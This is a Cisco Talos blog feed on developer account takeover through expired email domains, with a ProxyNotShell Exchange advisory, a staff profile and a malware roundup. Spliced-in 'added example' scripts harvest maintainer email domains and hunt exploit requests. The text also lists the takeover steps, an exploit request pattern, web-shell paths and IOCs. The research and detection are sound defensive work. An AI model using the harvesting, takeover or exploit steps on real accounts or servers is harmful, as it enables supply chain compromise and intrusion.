Cisco Talos

Developer account body snatchers pose risks to the software supply chain

4 October 2022 at 12:51


By Jaeson Schultz.
  • Over the past several years, high-profile software supply chain attacks have increased in frequency. Because these attacks can be difficult to detect, source code repositories and the accounts that publish to them became the focus of this research.
  • Developer account takeovers present a substantial risk to the software supply chain because attackers who successfully compromise a developer account could conceal malicious code in software packages used by others.
  • Talos analyzed several of the major software repositories to assess the level of developer account security, focusing specifically on whether developer accounts could be recovered by re-registering expired domain names and triggering password resets.
  • Many software repositories have already begun taking steps to enhance the security of developer accounts. Talos has identified additional areas where the security of developer accounts could be improved. Talos worked with vulnerable repositories to resolve issues that we found.

Software supply chain attacks, once the exclusive province of sophisticated state-sponsored attackers, have been gaining popularity recently among a broader range of cyber criminals. Attackers everywhere have realized that software supply chain attacks can be very effective and can yield a large number of compromised victims. Software supply chain attacks more than tripled in 2021 when compared with 2020. Why are software supply chain attacks so effective? Organizations that possess solid cyber defenses may be difficult to attack directly. However, these same organizations are likely vulnerable to a software supply chain attack because they still regularly run or build software obtained from vendors they trust.

Rather than attacking an entire software repository itself, or identifying an unpatched vulnerability in a software package, compromising the software supply chain can be as simple as attacking the accounts of the package developers and maintainers. Most software repositories track the identities of their software developers using those developers' email addresses. If a cybercriminal somehow gains access to a developer's email account, the attacker can theoretically generate password reset emails at these software repositories and take over the account belonging to that developer. Once inside, an attacker could then publish malicious updates to the code maintained by that developer, affecting every other piece of software that uses that library from then on.

Cisco Talos examined several frequently used code repositories. We looked specifically at the security afforded to developer accounts, and how difficult it would be for an attacker to take over a developer account. While some repositories had stringent security in place, others did not. Fortunately, we were able to work with the managers of these repositories to resolve the major issues we found.

Risks in the software supply chain

Re-inventing the wheel is typically not a good idea. This holds true for many things, including developing software. Much software written today depends on third-party packages and libraries to provide functionality the program needs. Utilizing third-party libraries and packages, especially open source, also speeds up development and lowers costs.

Popular software packages have also become attractive targets for attackers. The more popular a software library is, the more external software will be using that library, and thus, the larger the potential attack surface. Compromising a software library can potentially compromise every other piece of software that relies on that software library for its functionality. This is the risk inherent in the software supply chain.

With the exception of language-agnostic repositories like GitHub, most software repositories tend to be language specific. For example, JavaScript authors rely mostly on NPM, Python developers have PyPI, Perl programmers can often be found using packages obtained via CPAN, and so on. Each software repository sets its own rules when it comes to developers' accounts.

Additionally, as many programmers are aware, some programming languages make a better choice for solving certain types of problems. For example, embedded systems drivers are more commonly written in C instead of Perl, while parsing text is more commonly done in Perl or Python, rather than C. This means that the process of writing programs that integrate third-party libraries into the code will also be different for each language. It is difficult to imagine a developer integrating a third-party library into a system-level driver written in C without carefully reviewing the related code and testing it for speed and functionality. However, when developing a feature-rich Perl proof-of-concept application or a web-based JavaScript application, this might not always be the case. A programmer in those instances might conceivably import a package first and ask questions later. This means some software repositories will carry more risk than others when it comes to malware hiding in the source code.

NPM

NPM (Node Package Manager) is a JavaScript software repository and has been the subject of some "independent" security audits recently. There has been a lot of discussion online, especially concerning the security of the developer accounts there and how easy it is to take over these accounts by re-registering expired email domains.


There are more than 2 million packages in the NPM repository. Conveniently, an NPM package called "all-the-package-names" contains a list of all packages in the NPM repository. Each individual package at NPM has associated metadata, such as a text description of the package, a link to the package tarball, and a list of the package maintainers. Most importantly, the list of package maintainers has the developer's username and email address.



Iterating through all the package names, and extracting the email addresses, then further extracting the domain names from those email addresses, provides the raw data necessary to find developer accounts associated with expired domains. Once an expired domain is found, it can be re-registered and theoretically used to take over the NPM developer account. But does it work this way in practice?

Although we found a couple thousand developer account email addresses on expired domains, we could not recover any of the associated developer accounts. It appears the "couple things in place to protect against [account takeover]" that NPM administrator @MylesBorins mentioned in a tweet are working as planned.

Stale metadata helps foil attackers

NPM provides developers with the ability to update the email address associated with their accounts. When a developer switches email addresses, only the metadata of packages and versions published after the change will carry the new address. NPM does not retroactively update the metadata of versions that were published earlier. This means that, even though someone looking to take over an NPM developer account might find package metadata listing a developer email on an expired domain, it could simply be that the developer has since updated their NPM account to a new email address, and password reset mail would go there instead.

This was the case in May 2022, when a security researcher claimed to have taken over the NPM package "foreach" by re-registering the email domain belonging to the NPM developer. Unbeknownst to the security researcher, the developer in question had actually updated their NPM account to use their Gmail address instead. So if any password recovery attempts were made, they would have failed — NPM would have generated and sent the password reset emails to the new Gmail account on file, which is still under the original developer's control.



PyPI

PyPI is the Python Package Index and currently contains almost 400,000 projects. Developers at PyPI have email addresses associated with their accounts, however, PyPI does not display the email address publicly by default. This is an option that the developer must explicitly choose to enable. Many developers are, of course, eager to interact with others who are running their code, so it is no surprise that large numbers of developers enable this feature.

PyPI accounts do not come with MFA enabled by default, so this is something else a developer would have to choose to enable. However, in July 2022 PyPI announced that it was rolling out mandatory MFA to "critical projects," a.k.a. the top 1% of the projects at PyPI (based on the number of downloads).



A list of all PyPI packages is available online. Many of these packages contain a mailto: link containing an email address. There is also a list of maintainers of the package. For developers who expose their email addresses publicly, the address is found on the user's public profile page. It is a relatively simple process to scrape the email addresses associated with PyPI projects. PyPI also confirms whether a given email address is associated with an account, an enumeration oracle it arguably should not expose.



Account takeovers have been a problem at PyPI in the past. As recently as May 14, 2022, an attacker managed to take over a developer account and replaced the "ctx" package, adding malicious code that stole the user's environment variables, base64-encoded them and transmitted the data back to the attacker's C2 server. Fortunately, the changes made by the admins over at PyPI seem to be moving account security in the right direction.

CPAN

The Comprehensive Perl Archive Network (CPAN) contains more than 200,000 Perl modules. CPAN also provides an index of all the module authors.



The individual module authors each have their own "homepage" that lists their contributed modules. For anyone who wants to reach out to the dev, CPAN includes the author's email address.



A motivated attacker can easily scrape the CPAN website for a list of all author IDs and use those to scrape the email address belonging to each developer. A whois lookup on the domain of each developer email address shows which domains have lapsed, and that gave us a list of developer accounts vulnerable to account takeover. From there, all that is required is registering the domain, pointing its MX record at a mail server the attacker runs, and triggering a password reset, which delivers the magic link for the developer's account straight to the attacker's inbox.
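The harvesting step described for NPM above and again here for CPAN, as an added example that is not Talos's tooling: it walks npm-style package documents, pulls maintainer email domains, and splits the unregistered ones into live candidates and stale noise, honouring the NPM caveat that only the latest version's maintainer list reflects the address currently on file. The packages, people and domains are constructed (reserved .example/.invalid TLDs), and the `is_registered` callback is an assumption standing in for the WHOIS/RDAP lookup a real run would make; a CPAN author scrape produces the same (author, email) pairs and feeds the same triage.

```python
"""Triage maintainer e-mail domains for possible expiry (added example).

The packuments below are constructed; their shape follows the npm registry
document (https://registry.npmjs.org/<name>) trimmed to the fields used here.
The registration check is injected so the script runs offline.
"""
import re
from typing import Callable, Dict, List, Tuple

SAMPLE_PACKUMENTS = [
    {   # maintainer moved to webmail: old versions still show the dead domain
        "name": "left-widget",
        "dist-tags": {"latest": "2.0.0"},
        "versions": {
            "1.0.0": {"maintainers": [{"name": "alice", "email": "alice@old-domain.example"}]},
            "2.0.0": {"maintainers": [{"name": "alice", "email": "alice@gmail.com"}]},
        },
    },
    {   # latest version still lists an address on an unregistered domain
        "name": "right-widget",
        "dist-tags": {"latest": "0.3.1"},
        "versions": {
            "0.3.1": {"maintainers": [
                {"name": "bob", "email": "bob@mail.lapsed.invalid"},
                {"name": "carol", "email": "carol@gmail.com"},
            ]},
        },
    },
]

EMAIL_RE = re.compile(r"^[^@\s]+@([a-z0-9-]+(?:\.[a-z0-9-]+)+)$")


def email_domain(addr: str):
    """Lower-cased domain part of an e-mail address, or None if malformed."""
    m = EMAIL_RE.match(addr.strip().lower())
    return m.group(1) if m else None


def registrable_domain(domain: str) -> str:
    """Crude registrable-domain guess: the last two labels.

    'mail.lapsed.invalid' -> 'lapsed.invalid'.  Fine for triage; a real run
    should consult the public suffix list so 'x.co.uk' is not cut to 'co.uk'.
    """
    return ".".join(domain.split(".")[-2:])


def triage(packuments: List[Dict], is_registered: Callable[[str], bool]) -> Dict[str, list]:
    """Split unregistered maintainer domains into live candidates and stale noise.

    is_registered(domain) is the assumed stand-in for a WHOIS/RDAP lookup.
    Only the *latest* version's maintainer list is treated as current; older
    versions keep whatever address was on file when they were published, which
    is exactly how the 'foreach' false alarm happened.
    """
    candidates: List[Tuple[str, str, str]] = []
    stale_only: List[Tuple[str, str, str, str]] = []
    for pkg in packuments:
        latest = pkg["dist-tags"]["latest"]
        current_domains = set()
        for m in pkg["versions"][latest].get("maintainers", []):
            d = email_domain(m.get("email", ""))
            if not d:
                continue
            d = registrable_domain(d)
            current_domains.add(d)
            if not is_registered(d):
                candidates.append((pkg["name"], m["name"], d))
        for ver, meta in pkg["versions"].items():
            if ver == latest:
                continue
            for m in meta.get("maintainers", []):
                d = email_domain(m.get("email", ""))
                if not d:
                    continue
                d = registrable_domain(d)
                # Seen only in old metadata: report separately, do not act on it
                if d not in current_domains and not is_registered(d):
                    stale_only.append((pkg["name"], m["name"], d, ver))
    return {"candidates": candidates, "stale_only": stale_only}


if __name__ == "__main__":
    registered = {"gmail.com"}  # constructed stand-in for live lookups
    for bucket, rows in triage(SAMPLE_PACKUMENTS, registered.__contains__).items():
        for row in rows:
            print(bucket, *row)
```

The split matters on both sides: a researcher who re-registers a domain found only in old version metadata has spent money on an address the repository will never send a reset link to, and a repository operator auditing its own accounts should run this against the address actually on file rather than the published metadata.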





Talos has reached out to the admins at CPAN and provided them with a list of the vulnerable developer accounts we found. CPAN has disabled these accounts.

NuGet

NuGet is a software repository for .NET developers. The NuGet "gallery" contains more than 317,000 packages. Fortunately, registered developers at NuGet have their email addresses hidden by default. There is an option to allow users to contact you, using a form on the NuGet website that does not disclose the email address of the developer. Developers have the option of adding their Twitter handle, and many developers do. If an attacker wishes to attack NuGet developers en masse, they would have a very difficult time assembling a list of developer email addresses.



RubyGems

RubyGems is a software repository for Ruby developers. There are currently approximately 172,000 gems (packages) in the repository. Developer email addresses are hidden from the public by default. Even unchecking the "Hide email in public profile" check box has no discernible effect, and the email address remains hidden.



Some gems have "maintainers" files to indicate the contact email addresses of the developers, but this is not consistent across gems. Recently, the RubyGems team announced that they are enforcing MFA for top developer accounts.



Conclusion

The software supply chain attack problem is not likely to go away anytime soon. It is unreasonable to ask organizations to vet every piece of software that runs in their environment. Some amount of trust in software vendors and suppliers will always be necessary. However, that doesn't mean that defenders are helpless against these types of attacks.

Organizations should analyze what software is required on various internal systems. Many times, there may be opportunities to segment a group of systems running a particular piece of software from the rest of the internal network. This way, any compromise that occurs as a result of a software supply chain attack will be limited in scope. Obviously, there are limitations to this approach.

All parties in the software supply chain need to take more responsibility for security. For example, it would be far safer for software repositories to stop publishing or releasing any information related to a developer's email address. Yes, this is arguably a bit of security-by-obscurity, but it forces attackers to go elsewhere to correlate the email account of a developer with the particular software package in question, and greatly enhances the security of the repository. If a repository wishes to publish a developer's email address, it could instead give each developer an email address at the domain of the repository itself (ex., @npmjs.com, @cpan.org, etc.).

Forcing MFA on the most popular package maintainers also seems to be a sensible remedy that is currently being pursued by several repositories. However, security is always a delicate balance. If you sacrifice too much usability in the pursuit of security, developers may rebel, as was the case with PyPI developer "untitaker."

One sure-fire countermeasure against developer account takeover via expired domain registration is code signing. This is really the best way to be sure that the code you use has not been tampered with since it was last signed and is indeed from a developer you trust. An attacker who gets control of a developer's expired domain name would have no way to recover the code signing keys belonging to that developer and no way to impersonate that developer. The protection only holds, of course, if consumers actually verify signatures and learn the developer's public key through a channel the attacker does not control, rather than from the same account the attacker may have taken over.


Researcher Spotlight: Globetrotting with Yuri Kramarz

3 October 2022 at 14:00

From the World Cup in Qatar to robotics manufacturing in east Asia, this incident responder combines experience from multiple arenas 

By Jon Munshaw. 

Yuri “Jerzy” Kramarz helped secure everything from the businesses supporting the upcoming World Cup in Qatar to the Black Hat security conference and critical national infrastructure. 

He’s no stranger to cybersecurity on the big stage, but he still enjoys working with companies and organizations of all sizes in all parts of the world. 

“What really excites me is making companies more secure,” he said in a recent interview. “That comes down to a couple things, but it’s really about putting a few solutions together at first and then hearing the customer’s feedback and building from there.” 

Yuri is a senior incident response consultant with Cisco Talos Incident Response (CTIR) currently based in Qatar. He walks customers through various exercises, incident response plan creation, recovery in the event of a cyber attack and much more under the suite of offerings CTIR has. Since moving from the UK to Qatar, he is mainly focused on preparing various local entities in Qatar for the World Cup slated to begin in November. Qatar estimates more than 1.7 million people will visit the country for the international soccer tournament, averaging 500,000 per day at various stadiums and event venues. For reference, the World Bank estimates that 2.9 million people currently live in Qatar.

This means the businesses and networks in the country will face more traffic than ever and will no doubt draw the attention of bad actors looking to make a statement or make money off ransomware attacks. 

“You have completely different angles in preparing different customers for defense during major global events depending on their role, technology and function,” Kramarz said.  

In every major event, there were different devices, systems and networks interconnected to provide visitors and fans with various hospitality facilities that could be targeted in a cyber attack. Any country participating in the event needs to make sure they understand the risks associated with it and consider various adversary activities that might play out to secure these facilities. 

Kramarz has worked in several different geographic areas in his roughly 12-year security career, including Asia, the Middle East, Europe and the U.S. He has experience leading red team engagements (simulating attacks against targets to find potential security weaknesses) in traditional IT and ICS/OT environments, vulnerability research and blue team defense. The incident response field has been the perfect place for him to put all these skills to use. 

He joined Portcullis Security in 2011 as a security consultant and eventually moved throughout Cisco after it acquired Portcullis in 2015. As a red teamer, he had to develop exploits and think about the potential paper trail those exploits would leave behind — after all, it was his job to show where current security structures had failed. 

“Every time I would try to design a payload, I’d have to forensically understand what fingerprints are left on the system,” he said. “So effectively I had to do incident response for a decade before I joined CTIR.” 

That breadth of experience also helps because CTIR is platform-agnostic. He often must access and leverage other companies' technology and software, such as during the Black Hat conference earlier this year when he was part of a Cisco team that set up and defended the on-site network in Las Vegas.

“We had to check all the different technology stacks to make sure we could stop adversaries before they became a problem,” he said. “From there, we moved to use those technologies to detect what’s happening in real-time … and then we used [Cisco] SecureX to unify some of the response capability. By default, you pretty much must learn about every piece of technology that’s out there to provide an effective incident response as we can’t wait days or weeks to deploy something during an emergency.” 

Yuri is used to working in different time zones at different hours of the day, too. His favorite incident response to an engagement call came around midnight one night when he was on call — a large conglomerate was under attack and the adversaries deployed ransomware. He was part of the CTIR team who immediately responded to identify and eradicate the ransomware attack. CTIR eventually successfully brought systems back online.  

“And from there, we built a great relationship with the customer that’s been ongoing since then,” he said. 

Yuri enjoys golfing in his free time.

Although incident response can lead to these kinds of late nights, Yuri said he's thankful that Cisco Talos offers him the flexibility to work different hours and take time off when he needs it. Golf is his current outlet for relaxation, and it gives him something mutual to talk to people about regardless of what country they're in. While not out on the green he likes to contribute to several open-source projects.

Since coming into the incident response field, he’s had to flex his interpersonal skills more than ever because CTIR places such an emphasis on making IR a team sport. 

“The way I try to carry myself is to be happy and to look at my reflection every morning and say, ‘I’m doing the best I can for my customer,’” Kramarz said. “If I put my signature on a report, I want to make sure I’m proud of it.” 

Once the World Cup wraps up, Yuri said he will carry on focusing on securing critical infrastructure and operational technology. It’s a unique challenge, he said, because a lot of the technology can be more than 20 or 30 years old, and each customer is going to need a unique solution to their problems.  

“One time during an incident in a different country, we had to look at physical manuals in binders from a decade before to figure out how the affected device actually worked and how someone could hack it, as only several of the devices had ever even been produced,” he said. “We know how to acquire evidence on the standard operating systems out there such as Unix or Windows, and we have the tools of the trade to help us with that. We often don’t get that in ICS/OT environment, so innovation is a key in this field.” 

If your organization would like to work with Yuri or one of his fellow CTIR team members, you can reach out to them here. Talos Incident Response offers a range of proactive services for security teams, including hands-on tabletop exercises, a state-of-the-art cyber range for training and much more.   

Threat Advisory: Microsoft warns of actively exploited vulnerabilities in Exchange Server

30 September 2022 at 21:16


Cisco Talos has released new coverage to detect and prevent the exploitation of two recently disclosed vulnerabilities collectively referred to as "ProxyNotShell," affecting Microsoft Exchange Server 2013, 2016 and 2019. One of these vulnerabilities could allow an attacker to execute code remotely on the targeted server. Limited exploitation of these vulnerabilities in the wild has been reported. CVE-2022-41040 is a server-side request forgery (SSRF) vulnerability, while CVE-2022-41082 enables remote code execution (RCE) when PowerShell is accessible to the attacker. Both require authenticated access to the Exchange server, which is why they are typically chained after credential theft rather than used for unauthenticated initial access.

While no fixes or patches are available yet, Microsoft provided mitigations for on-premises Microsoft Exchange users on Sept. 29, 2022. Even organizations that use Exchange Online may still be affected if they run a hybrid server. Cisco Talos is closely monitoring the recent reports of exploitation attempts against these vulnerabilities and strongly recommends users implement the mitigation steps while waiting for security patches. Exchange vulnerabilities have become increasingly popular with threat actors, as they can provide initial access to network environments and are often used to facilitate more effective phishing and malspam campaigns. The Hafnium threat actor exploited several zero-day vulnerabilities in Exchange Server in 2021, and the same flaws were quickly reused by other actors to deliver ransomware; Cisco Talos Incident Response reported that the exploitation of Exchange Server issues was one of the four attacks they saw most often last year.


Vulnerability details and ongoing exploitation


Exploit requests for these vulnerabilities look similar to previously discovered ProxyShell exploitation attempts:

autodiscover/[email protected]/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%[email protected]

Successful exploitation of the vulnerabilities observed in the wild leads to preliminary information-gathering operations and the deployment of web shells for continued access to compromised servers. Open-source reporting indicates that web shells such as AntSword (a popular Chinese-language open-source web shell), SharPyShell (an ASP.NET-based web shell) and China Chopper have been deployed on compromised systems, leaving the following artifacts:

  • C:\inetpub\wwwroot\aspnet_client\Xml.ashx
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
  • C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx


This activity is consistent with what is typically observed when attackers begin leveraging vulnerabilities in unpatched or vulnerable systems exposed to the internet.

Initial reporting observed the download and deployment of additional malicious artifacts and implants on the infected systems using certutil, however these TTPs may change as more threat actors start exploiting the vulnerabilities followed by their own set of post-exploitation activities.
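A way to hunt for the request pattern and the web shell artifacts listed above in IIS front-end logs, as an added example that is not Talos's coverage or tooling. The request-URI check is modelled on the pattern Microsoft published with its initial URL Rewrite mitigation for CVE-2022-41040 (autodiscover.json, then an @, then Powershell); the mapping of the on-disk artifact paths to the URLs IIS would log for them is an assumption; the log lines are constructed; and the IOC IPs are a subset of the list in this advisory, kept defanged in the source and refanged on use.

```python
"""Hunt for ProxyNotShell / ProxyShell-style requests and known web-shell hits
in IIS W3C logs (added example; log lines constructed)."""
import re
from dataclasses import dataclass, field
from typing import Dict, Iterator, List, Tuple

# Modelled on Microsoft's initial URL Rewrite mitigation pattern for CVE-2022-41040.
EXPLOIT_URI = re.compile(r"autodiscover\.json.*@.*powershell", re.IGNORECASE)

# Artifact paths from the advisory as URL stems (assumed mapping:
# FrontEnd\HttpProxy\owa\auth -> /owa/auth, wwwroot\aspnet_client -> /aspnet_client).
WEBSHELL_STEMS = {
    "/aspnet_client/xml.ashx",
    "/owa/auth/erroree.aspx",
    "/owa/auth/pxh4hg1v.ashx",
    "/owa/auth/redirsuiteserviceproxy.aspx",
}

# Subset of the advisory's IP IOCs, refanged at load time.
IOC_IPS = {s.replace("[.]", ".") for s in (
    "137[.]184[.]67[.]33", "206[.]188[.]196[.]77", "185[.]220[.]101[.]182",
)}

# Constructed IIS W3C log: one benign OWA hit, one exploit attempt, one POST to a
# known web-shell path from an IOC address, one ordinary Autodiscover request.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2022-09-30 01:02:03 10.0.0.5 GET /owa/ - 443 198.51.100.20 Mozilla/5.0 200
2022-09-30 01:02:04 10.0.0.5 POST /autodiscover/autodiscover.json@evil.example/powershell Email=autodiscover/autodiscover.json%3f@evil.example 443 203.0.113.7 python-requests/2.28.1 200
2022-09-30 01:02:05 10.0.0.5 POST /owa/auth/errorEE.aspx - 443 137.184.67.33 Mozilla/5.0 200
2022-09-30 01:02:06 10.0.0.5 GET /autodiscover/autodiscover.json Email=user@corp.example 443 198.51.100.21 Microsoft-Outlook 200
"""


@dataclass
class Hit:
    line_no: int
    client_ip: str
    reasons: List[str] = field(default_factory=list)


def parse_w3c(text: str) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line_no, record) for each data line, using the #Fields: header.

    IIS replaces spaces inside field values with '+', so whitespace splitting
    is safe; lines whose field count does not match the header are skipped.
    """
    fields = None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue
        yield n, dict(zip(fields, parts))


def hunt(text: str) -> List[Hit]:
    """Flag exploit-shaped URIs, requests to known web-shell paths and IOC sources."""
    hits: List[Hit] = []
    for n, rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        uri = stem if query == "-" else f"{stem}?{query}"
        reasons = []
        if EXPLOIT_URI.search(uri):
            reasons.append("proxynotshell-uri")
        if stem.lower() in WEBSHELL_STEMS:
            reasons.append("known-webshell-path")
        if rec.get("c-ip") in IOC_IPS:
            reasons.append("ioc-ip")
        if reasons:
            hits.append(Hit(n, rec.get("c-ip", "?"), reasons))
    return hits


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(f"line {h.line_no} from {h.client_ip}: {', '.join(h.reasons)}")
```

Run it over the HttpProxy logs under the Exchange logging directory rather than only the default IIS site logs, since the front-end proxy records the backend path the attacker targeted. The web-shell list is a starting point, not a fence: any newly created .aspx or .ashx under the owa\auth and aspnet_client directories deserves the same scrutiny, and a URI match alone is an exploitation attempt, not proof of success.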

Coverage


Ways our customers can detect and block this threat are listed below.



Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Cisco Talos is releasing SID 60642 to protect against CVE-2022-41040.

In addition we are releasing SIDs 60637-60641 to protect against malicious activity observed during exploitation of CVE-2022-41082.

The existing SIDs 27966-27968, 28323, 37245, and 42834-42838 provide additional protection for the malicious activity observed during exploitation of CVE-2022-41082.

The following ClamAV signatures have been released to detect malware artifacts related to this threat:

  • Asp.Backdoor.AntSword-9972727-1
  • Asp.Backdoor.Awen-9972728-0
  • Asp.Backdoor.AntSword-9972729-0


IOCs

IPs and URLs

125[.]212[.]220[.]48
5[.]180[.]61[.]17
47[.]242[.]39[.]92
61[.]244[.]94[.]85
86[.]48[.]6[.]69
86[.]48[.]12[.]64
94[.]140[.]8[.]48
94[.]140[.]8[.]113
103[.]9[.]76[.]208
103[.]9[.]76[.]211
104[.]244[.]79[.]6
112[.]118[.]48[.]186
122[.]155[.]174[.]188
125[.]212[.]241[.]134
185[.]220[.]101[.]182
194[.]150[.]167[.]88
212[.]119[.]34[.]11
137[.]184[.]67[.]33
206[.]188[.]196[.]77
hxxp://206[.]188[.]196[.]77:8080/themes.aspx




Threat Roundup for September 23 to September 30

30 September 2022 at 20:46

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 23 and Sept. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name (Type): Description

Win.Virus.Parite-9970689-0 (Virus): Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.

Win.Malware.Zusy-9970856-0 (Malware): Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

Win.Dropper.Remcos-9970861-0 (Dropper): Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.

Win.Malware.Emotet-9970880-0 (Malware): Emotet is currently one of the most widely distributed and active malware families. It is a highly modular threat that can deliver a wide variety of payloads. The botnet is commonly delivered via Microsoft Office documents with macros sent as attachments to malicious emails.

Win.Dropper.TrickBot-9970890-0 (Dropper): TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution such as VB scripts.

Win.Dropper.XtremeRAT-9971238-0 (Dropper): XtremeRAT is a remote access trojan active since 2010 that allows the attacker to eavesdrop on users and modify the running system. The source code for XtremeRAT, written in Delphi, was leaked online and has since been used by similar RATs.

Win.Dropper.Kuluoz-9971090-0 (Dropper): Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that downloads and executes follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.

Win.Dropper.Shiz-9971537-0 (Dropper): Shiz is a remote access trojan that allows an attacker to access an infected machine in order to harvest sensitive information. It is commonly spread via droppers or by visiting a malicious site.

Win.Packed.Fareit-9971247-1 (Packed): The Fareit trojan is primarily an information stealer with functionality to download and install other malware.

Threat Breakdown

Win.Virus.Parite-9970689-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 29 samples
Registry Keys (Occurrences)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED, Value Name: HideFileExt (29)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED, Value Name: Hidden (29)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE, Value Name: fullpath (29)
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: LanguageList (1)
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E, Value Name: @explorer.exe,-7001 (1)

Files and/or directories created (Occurrences)
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp (29)

File Hashes

0536b9760519d832e0c5ff072cad054ef2ae43dbe57330d48c609aeb75e6ae43
0fb870a5615c6c24fa559ae795c3366d80a97622fe2efac880330772344a9760
10308179aec9cf03dfe7fcd95aba9f1da191f70406d653157ea3746e63423c93
15e5fc751dbee4b99c094bbfd15d5b4c3655e0a8a34af84cb4773f2bcd265db8
16048c5e4b000118579343bcf188dbb5bcc0d313bd144a08a76423a7ff990c58
1a16bf0852508c3742325cd1b25c6fa9f9580e42017f273ff81d41edea8bd579
23c44b2d663dcb0224e7a2dcbd9a179923baf1c1d95f221f0435eef3fa6c7913
264dfb45197cb3e37d2054313e54c5549dd53f9d6cbc4a7cf9963b8275e59811
3605daf57520cfe6759abc471cb9a55ff4a6b99711ee3718ce6db3438b63a7e0
39139ac00356189a53c9122b4efa10a9e5ca42b25656cc794d4199d5a0e6003a
3a19cc265b1767563c293cfe5dfd8083a1cb72e37625bd243538f210594bd9bf
51f14dad750e0a93bdf69200d726c8f929a6e903dc837fefc5b2efdf7b33493e
530e290a3e9383bc016d666d4829f2ca2c256f5f32e8c84e71346f1d4a65302a
58950830c787ae1768a8d5aab290270b089b04e61d39e6b82a7daf51696fea03
5b0d897a5c748d58c536b19b0d16b3262cc238d65ac41d22f4552d1a2a0ea966
66fe640d820e530e4554251bcb07177a4f2fdea28fc13beb588898a0374fd20d
714ced6bb466961048291a1f89355892490a10bd6e206a256b2e3b97bf1fec55
7dbd9b1e5792f9085af025e526f331e00c878b2adc2e0d8c4a2c5dba4d79a32b
8c8c7b2a40fcdff745e87d060daac5798bda65e8e1568dd46e69d703a5adace3
933768be5d22750f182e69c91630a6f7af6f5db309ba61f83d5547c9a8865273
95463bf7d0d934880a1292e479f56d69596e43062eb18265ef43905702551af0
a1af5ed894006b1690455b12e58c117725a5274e7fc6f8410af119429171372d
a9a2deaa34de9ebc68523c18ad02f8a27aae60818fda1583440df25f336f61c2
aedea0e8e6ee4e36191b3e67dcc71e169ea9c1419b5ad4a062f3f2d37a99f3a3
c000e844ca7377e4f3a8e4bfdf0962897effa1622660e8b48d190e2820ff4429
*See JSON for more IOCs

Coverage

Product                     Protection
Secure Endpoint             This has coverage
Cloudlock                   N/A
CWS                         This has coverage
Email Security              This has coverage
Network Security            N/A
Stealthwatch                N/A
Stealthwatch Cloud          N/A
Secure Malware Analytics    This has coverage
